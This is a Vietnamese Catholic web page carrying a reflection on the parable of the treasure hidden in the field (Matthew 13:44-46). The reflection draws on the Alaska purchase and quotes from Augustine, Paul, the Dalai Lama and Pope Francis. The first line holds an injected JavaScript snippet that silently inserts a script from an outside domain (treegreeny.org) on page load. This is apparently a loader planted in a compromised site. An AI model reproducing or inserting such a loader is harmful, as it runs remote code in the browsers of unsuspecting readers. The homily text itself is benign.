;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ĐI TÌM KHO BÁU-Thứ 4 tuần XVIITN Mt 13, 44-46 – Xitô PS

ĐI TÌM KHO BÁU-Thứ 4 tuần XVIITN Mt 13, 44-46

ĐI TÌM KHO BÁU

Suy niệm thứ 4, CN XVII TN

(Xh 34, 29-35; Mt 13, 44-46)

Duy Khiêm

Khi đọc Tin Mừng hôm nay bản thân chợt nghĩ tới câu chuyện thương vụ nổi tiếng về việc Mỹ bỏ tiền mua lãnh thổ Alaska từ Nga vào năm 1867, và biến nó thành tiểu bang thứ 49 của Mỹ. Lúc đó báo chí đã làm rùm beng lên, và gọi nhiều cái tên nhạo báng như: “trò điên rồ của Seward” hay “tủ đá của Seward”, bởi ngoại trưởng Mỹ William H. Seward đã tán thành và phụ trách thương thuyết việc mua bán này. Với nhiều người Mỹ thời bấy giờ thì đây là vùng đất cằn cỗi, vô dụng, băng giá, lại xa xôi, không giáp với bất cứ bang nào của Mỹ. Thật dại đột khi mua vùng đất này, cho dù giá mua rẻ mạt, chỉ 7,2 triệu USD (tương đương 3xu đôla/hecta), diện tích của nó lớn hơn cả Anh, Pháp, Ý và Tây Ban Nha cộng lại. Thế nhưng chỉ ít lâu sau đó dư luận bắt đầu chuyển sang hướng ủng hộ khi biết rằng ở đây có mỏ kẽm lớn nhất thế giới, còn có mỏ vàng, mỏ đồng, những giếng dầu ẩn sâu dưới lớp băng quanh năm lạnh giá và tài nguyên thiên nhiên khổng lồ mà Alaska cất giấu trong lòng nó. Alaska trở thành “vùng đất vàng” khi đem lại lợi nhuận kinh tế khổng lồ cho Mỹ. Hằng năm vào thứ Hai cuối cùng tháng 3 là ngày lễ ở Alaska nhằm tôn vinh công lao của Seward. Ông đã có tầm nhìn rộng để rồi có thể nhận ra được giá trị đích thực của vùng đất mà đa số người ta chỉ nhìn thấy sự vô dụng của nó. Cái được cho là dại dột, điên rồ năm nào giờ trở thành sự khôn ngoan và được người đời ca ngợi tán dương.

Việc nhiều kitô hữu dám bán tất cả, khước từ mọi thứ, từ bỏ mọi sự ở thế gian này để tìm kiếm kho báu Nước Trời đối với người đời thì đây quả là là hành động của kẻ điên khùng, dại dột, ngu dốt. “Song những gì thế gian cho là điên dại, thì Thiên Chúa đã chọn để hạ nhục những kẻ hùng mạnh” (1Cr 1,27). Ẩn sau “mảnh đất” thế gian này có một thực tại vô cùng quý giá mà nhiều người không biết, cũng có người ra sức tìm kiếm, nhưng ít ai “chạm” tới được; nhiều người bỏ cuộc vì thiếu niềm xác tín. Có lẽ lý do chính đều vì đa số người ta chưa biết rõ, chưa cảm nhận và xác tín về sự hiện hữu của thực tại đó. Chưa biết giá trị thực nên đứa trẻ sẽ dễ dàng chọn viên kẹo thay vì thỏi vàng. Chúa Giêsu đã dùng tới 5 dụ ngôn trong chương 13 này để nói về thực tại Nước Trời, bởi “nơi” đó không giống với thế giới chúng ta, những gì chúng ta có thể nhận biết được là khám phá qua các dấu chỉ và qua chính Lời Chúa như tấm bản đồ, là kim chỉ nam dẫn tới kho báu. Mỗi dụ ngôn đều cho chúng ta một khía cạnh về dấu chỉ của Nước Trời. Sức mạnh nội tại ở những thứ được xem là nhỏ bé, tầm thường như hạt cải hay như nắm men trong thúng bột, nhưng lại có sức sống và sự lan tỏa mãnh liệt (x. Mt 13, 31-33). Nước Trời như kho báu được giấu trong ruộng, ngay cả chủ ruộng chưa chắc đã nhận ra kho báu đó. Có khi cả đời ngồi trên kho báu mà không biết (x.Mt 13, 44-46). Nếu Nước Trời là kho báu, vậy nó ở đâu trong “mảnh đất” cuộc đời chúng ta?! Nhạc sĩ Mai Thiện đã phổ nhạc đoạn Tin Mừng hôm nay với tựa đề: “Nước Trời ví như kho tàng” và phần điệp khúc ngài viết: “Chúa ơi xin dạy chúng con biết tìm kiếm Ngài là kho tàng vô giá…là ngọc quý vô song…”. Chúa chính là kho tàng, là ngọc quý, có được Chúa là được chính Nước Trời. Vậy chúng ta có thể tìm Chúa ở đâu? Có lẽ nhiều người vẫn nghĩ Chúa ở trên cao, Chúa ở một nơi nào đó rất xa, vì thế mà Ngài cũng chẳng thấy đại dịch Covid_19 đang hoành hành khắp thế giới!?

 Trong cuốn “Tự Thuật” của thánh Augustino có đoạn: “Lạy Chúa, con đã yêu mến Chúa quá muộn… Chúa ở trong con mà con lại cứ chạy ra ngoài tìm Chúa … Chúa hiện diện ở trong con nhưng con không sống ở trong Chúa. Nhiều tạo vật đã kìm hãm khiến con sống xa Chúa.”

Thánh Phaolô cũng quả quyết: “Nào anh em chẳng biết rằng anh em là Đền Thờ của Thiên Chúa, và Thánh Thần Thiên Chúa ngự trong anh em sao? … Đền Thờ Thiên Chúa là nơi thánh, và Đền Thờ ấy chính là anh em.” (1Cr 3, 16.17). Như thế thực tại về Nước Trời, về Thiên Chúa ở rất gần, ngay trong bản thân của mỗi người và cần được đào sâu, tìm kiếm. Giống như kho tàng đang chôn giấu, nó chỉ thuộc về ta sau khi ta đã bền bỉ kiên trì và chịu đựng khổ đau để xứng đáng nhận được kho tàng quý giá ấy.

Nhiều bậc thầy tâm linh cho rằng trong con người chứa đựng một sức mạnh nội tại vô cùng lớn nhưng trong trạng thái ngủ đang chờ được đánh thức. Nó chưa được khai phá một khi vẫn nằm sâu dưới lớp băng của sự vô thức. Khi tiềm năng này được châm ngòi bởi ý thức, nó sẽ trở thành một năng lực vô biên. Nhưng con người có xu hướng thích đi tìm những điều thuộc vĩ mô, chinh phục những hành tinh xa xôi, để rồi quên mất những thực tại xung quanh và đánh mất chính bản thân mình, là một “tiểu vũ trụ”. Bởi thế mà người ta vẫn sống trong u mê và lạc lối mà cứ tưởng đã công thành danh toại.

Khi được một phóng viên hỏi: “Điều gì làm ngài ngạc nhiên nhất về nhân loại?” Đức Đạt Lai Lạt Ma đã trả lời: “Điều làm tôi ngạc nhiên nhất đó chính là con người. Có ba điều mâu thuẫn. Điều thứ nhất, con người mất rất nhiều sức khỏe để kiếm tiền, rồi lại mất rất nhiều tiền chỉ để lấy lại sức khỏe. Điều thứ hai, con người quá lo âu về tương lai đến mức quên mất hiện tại nên cuối cùng con người chẳng sống cho hiện tại và cũng chẳng sống cho tương lại. Điều thứ ba, con người sống như thể không bao giờ chết nên con người sẽ chết như chưa bao giờ sống”.[1]

Những gì Đức Đạt Lai Lạt Ma nói phản ánh đúng lối sống của phần đông nhân loại ngày nay: lo bôn ba tìm kiếm những cái hão huyền rồi cuối cùng chỉ đưa tới chỗ diệt vong. Phía sau những hào quang là chuỗi dài đau khổ. Của cải vật chất hay các tiện nghi chẳng lấp đầy được một tâm hồn trống rỗng. Sống giữa một thế giới đầy dẫy những giá trị nhất thời, giả tạo, phù phiếm, việc tìm kiếm giá trị cao quý, vĩnh hằng không phải là điều dễ dàng, nhất là những giá trị của Nước Trời lại càng khó hơn nữa vì kho báu này vô hình và phải bỏ ra nhiều công sức mới có thể cảm nghiệm được giá trị ấy.

Tin Mừng hôm nay như một lời mời gọi khẩn thiết: hãy tìm kiếm Nước Thiên Chúa, đó chính là giá trị đích thực của đời người, là kho báu là ngọc quý không có gì ở trần gian này bì kịp. Cái giá phải trả là đánh đổi, “bán tất cả những gì mình có” để mua. Cái giá đó thật quá hời để mua được sự sống vĩnh hằng. Chỉ những ai biết và xác tín được giá trị đích thực của kho báu mới có khả năng vui vẻ đánh đổi tất cả để “mua” cho bằng được kho tàng Nước Trời. ĐTC Phanxicô khuyên bảo: “Chúa Giêsu Kitô và Nước Thiên Chúa là kho tàng vĩ đại vô giá chúng ta cần tìm kiếm và hy sinh mọi sự để chiếm hữu[2]. Chính Lời Chúa là ngọn đèn là ánh sáng sẽ dẫn lối đưa đường cho chúng ta tìm thấy kho tàng đó (x. Tv 118,105).

Nguyện xin Chúa cho chúng ta biết đặt kho tàng đời mình ở nơi Chúa, không lấy gì quý hơn kho tàng Nước Trời. Xin Chúa cho chúng ta đức khôn ngoan của Chúa, để chúng ta biết chọn lựa những giá trị đích thực trong cuộc sống tại thế này, là lo tìm khiếm Nước Trời.

 

[1] Trích: “Lời từ cõi lặng”, Lm. Giuse Tạ Xuân Hòa, nxb Đồng Nai, 04.2021, tr.12

[2] Buổi đọc kinh Truyền Tin tại quảng trường thánh Phêrô trưa Chúa Nhật 27-7-2014

.

You May Also Like

Trả lời

X